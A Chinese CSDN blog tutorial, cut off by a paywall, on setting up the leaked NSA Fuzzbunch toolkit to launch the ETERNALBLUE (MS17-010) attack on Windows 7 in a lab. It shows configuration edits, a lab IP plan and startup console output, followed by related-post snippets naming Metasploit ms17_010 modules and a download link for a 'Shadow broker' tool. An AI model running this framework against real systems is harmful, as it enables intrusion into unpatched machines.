利用NSA的MS17-010漏洞利用工具攻击Windows7

最新推荐文章于 2024-06-21 15:54:14 发布
最新推荐文章于 2024-06-21 15:54:14 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: metasploit msf ms17-010 windows7
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_Z_W_/article/details/113745064
版权

0x01 Download NSA工具包

NSA工具包下载

攻击脚本需要32位的Python2.6环境,所以攻击机还需以下两个环境:

python-2.6.6.msipywin32-221.win32-py2.6.exe

0x02 修改NSA工具配置文件

  • 修改C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py文件

注释掉第72行代码#addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)

def load_plugins(fb):
    fb.io.pre_input(None)
    fb.io.print_msg("Loading Plugins")
    fb.io.post_input()
    addplugins(fb, "Exploit",       EXPLOIT_DIR, EDFPlugin)
    addplugins(fb, "Payload",       PAYLOAD_DIR, EDFPlugin)
    addplugins(fb, "Touch",         TOUCH_DIR,   EDFPlugin)
    addplugins(fb, "ImplantConfig", IMPLANT_DIR, EDFPlugin)
    #addplugins(fb, "ListeningPost", LP_DIR,      EDFPlugin)
    addplugins(fb, "Special",       SPECIAL_DIR, DAVEPlugin, DeployableManager)
  • 修改C:\Users\Administrator\Desktop\shadowbroker-master\windows\Fuzzbunch.xml文件

修改第19行代码的Resources路径和第24行代码的logs路径,改成目前工具包存放的路径

<t:parameter name="ResourcesDir"
    description="Absolute path of the Resources Directory"
                 type="String"
                 default="C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources"/>
<t:parameter name="LogDir"
    description="Absolute path of an Initial Log Directory"
                 type="String"
                 default="C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs"/>

0x03 运行fb.py脚本实施ETERNALBLUE攻击

  • 环境说明:
测试机 Windows 7/2008 10.130.3.246
攻击机 Windows 10 10.130.3.243
攻击机 Kali 10.130.3.242
  • 运行fb.py文件实施Eternalblue攻击

运行C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py文件

Microsoft Windows [版本 10.0.18363.1316]
(c) 2019 Microsoft Corporation。保留所有权利。

C:\Users\Administrator\Desktop\shadowbroker-master\windows>python fb.py

--[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

  0) prompt confirm
  1) execute


Exploit Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Special Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Payload Autorun List
=========
最低0.47元/天 解锁文章
小晓晓晓林
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit 渗透测试
小能猫的博客
01-18 4130
┌──(root????kali)-[/home/kali/Desktop] └─# service postgresql start ┌──(root????kali)-[/home/kali/Desktop] └─# msfdb init [i] Database already started [+] Creating database user 'msf'...
ms17-010.7z
01-28
标题“ms17-010.7z”和描述中的“国赛乱杀脚本”涉及的是一个网络安全领域的著名漏洞利用工具,该工具通常用于教育和竞赛环境,以模拟真实世界的网络安全攻击。这里提到的“ms17-010”是微软Windows操作系统的一个...
使用metasploit(MSF)对windows的ms17-010漏洞进行利用
此博客内容主要是小可日常工作中的一些问题解决的记录整理而成
08-14 1233
Ping扫描-禁用端口扫描负责检查目标机是否有常见漏洞,如MS08-067。
Windows网络服务渗透测试实战-跨网段攻击
c_lanxiaofang的博客
05-19 6301
一、实验项目名称 Windows网络服务渗透测试实战-跨网段攻击 二、实验目的及要求 掌握对跨网段攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 获取winxp系统管理员admin的密码,并使xp系统关机 ----基础配置---- 1、选择win7 2.选择winXP 3、选择kali 4、查看kali的ip 5、查看winXP的ip 6、查看win7的IP 总结如下: ...
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
最新发布
记录学习
06-21 2204
msf永恒之蓝漏洞复现过程以及修复建议
Windows网络服务渗透测试实战MS17-010漏洞复现
c_lanxiaofang的博客
05-16 3406
一、实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现 二、实验目的及要求 熟悉Metasploit终端的使用方法; 掌握对MS17-010漏洞攻击的方法。 三、复现步骤(附加文字说明加截图) 1、NAT模式 Kali-Linux :192.168.232.141 Windows 7: 192.168.232.142 2、查看ip kali:ip a win7:ipconfig 3、重启网卡 service networking restart 4、测试是否连通 k
永恒之蓝MS17-010
A_dmin的博客
09-16 1470
永恒之蓝MS17-010 实验概述   Ms17-010漏洞又称永恒之蓝漏洞,自从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了“明星”。在过去的五月中,这个Exploit被多款恶意软件利用。包括肆虐的WannaCryp0t,无文件的勒索软件UIWIX和SMB蠕虫EternalRocks,本实验介绍如何利用ms17-010漏洞对windows7进行攻击。 实验目的 ...
ms17-010补丁下载
04-22
ms17-010 补丁是微软在2017年发布的一个紧急安全更新,它修复了SMB(Server Message Block)协议中的一个远程代码执行漏洞,该漏洞存在于Windows操作系统的多个版本中,包括Windows 7。SMB是一种网络通信协议,用于...
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
07-27
【标题】"NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)"涉及的是一个特定的网络安全技术主题,主要聚焦于微软操作系统中的MS17-010漏洞,这是一个著名的安全漏洞,由美国国家安全局(NSA)发现并公开。...
网安永恒之蓝检测工具
04-02
永恒之蓝(EternalBlue)是利用微软Windows系统MS17-010安全漏洞的一种攻击工具,由NSA(美国国家安全局)开发,后被黑客组织泄露并广泛用于恶意攻击,例如 WannaCry 勒索病毒就与此漏洞有关。 该工具的"傻瓜式操作...
永恒之蓝漏洞扫描工具官方版
08-06
"永恒之蓝漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具利用。该漏洞主要针对的是未打补丁的Windows系统...
Shadow Brokers 渗透工具.zip
01-01
Shadow Brokers 渗透工具
Shadow broker IPC$.rar
12-31
Shadow broker安全测试渗透工具点击帽子即可进入使用软件 <<<<<>>>>>> 黑色命令输入框载入以下功能 >启动445pro生成窗口>>>>>>>>>>>>> 链接: https://pan.baidu.com/s/1JqTrBo4L0cYuTqamPFMSLA 提取码: 7rr1 启动ipC$渗透窗口启动命令Startcmd.exe Ptart135ipc$启动135ipc$渗透窗口 Dtart1433启动1433渗透文本 Etar445启动445渗透文本 Rtar135启动135渗透文本 GtarHOUMENFENGE启动分离 LtarWENJIANKUNBANGJIANCEFENLIQI文件捆绑检查分离器 HtarFANWENJIANKUNBANGGONGJU反文件捆绑器
ms17-010漏洞利用教程
weixin_33766168的博客
05-13 1416
主要是方便自己之后忘了,而写的,大佬绕过,大佬绕过,大佬绕过,重要的说三遍。哈哈***机:IP地址:192.168.10.15系统:kali linux靶机:IP地址:192.168.10.13系统:win7启动metasploit-framework~# msfconsole查找需要用到的***模块:msf > search ms17-010Matching Mod...
永恒之蓝(ms17-010)复现对win7与win server2008 R2渗透
Lzcsfg的博客
04-10 1524
在虚拟机中安装关闭win7与win2008的防火墙,并正常有ip地址。本文对两种windows进行攻击测试,可以选用安装一个windows即可原理:永恒之蓝(EternalBlue)是一个由美国国家安全局(NSA)开发的网络攻击工具,它利用了Windows操作系统中的一个漏洞,该漏洞被标记为MS17-010。这个漏洞影响了微软的SMB协议(Server Message Block),该协议通常用于在本地网络中共享文件、打印机和其他资源。
FuzzBunch之payload—Regdelete复现(win7)
ckm1607011的博客
07-15 583
FuzzBunch资源:https://github.com/misterch0c/shadowbroker,从GitHub上下载下来解压为 我要复现的是windows的工具—windows文件夹下payloads子文件夹下的工具Regdelete exe作为插件,通过FuzzBunch框架调用运行,具体可以参见这篇博客:https://blog.csdn.net/yiyiiyiy/article/details/78627053 FuzzBunch框架配置好之后,按win+R快捷键,输入cmd进入命
永恒之蓝漏洞(windows7
Ricklzc的博客
01-10 3609
扫描端口 ┌──(root????kali)-[~/桌面] └─# nmap -sS -p 445 -oG - 192.168.0.0/24 | grep open Host: 192.168.0.18 (localhost) Ports: 445/open/tcp//microsoft-ds/// Host: 192.168.0.26 (localhost) Ports: 445/open/tcp//microsoft-ds/// Host: 192.168.0.44 (localhost) Por
使用永恒之蓝(MS17-010)漏洞入侵windows7
weixin_34303897的博客
07-02 1194
永恒之蓝简介 前几天,被勒索病毒(Wannacry)刷屏了,这个病毒是大家知道了备份文件的重要性,当然,我是不怕什么病毒的,因为我是一天备份一次文件,而且微云一份,坚果云,移动硬盘一份,就算被黑了又能怎样,最多花个一天时间装个系统,配置一下系统。而且我是不用垃圾windows的,linux百毒不侵,而且我的系统是天天更新。所以说被黑了...
how to use metasploit to attack
river
05-16 1041
I’m sorry for my english,0^0 (1) on kali2 start shell and input msfconsole here i will explain some args for msfconsole [+++++]. banner you would see banner for etasploit,which information useful...
ms17-010(永恒之蓝)
09-20
为了利用ms17-010漏洞,攻击者通常会使用两个模块:auxiliary/scanner/smb/smb_ms17_010用于扫描是否存在漏洞,exploit/windows/smb/ms17_010_eternalblue用于实际攻击。首先,使用扫描模块对目标进行扫描,如果发现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值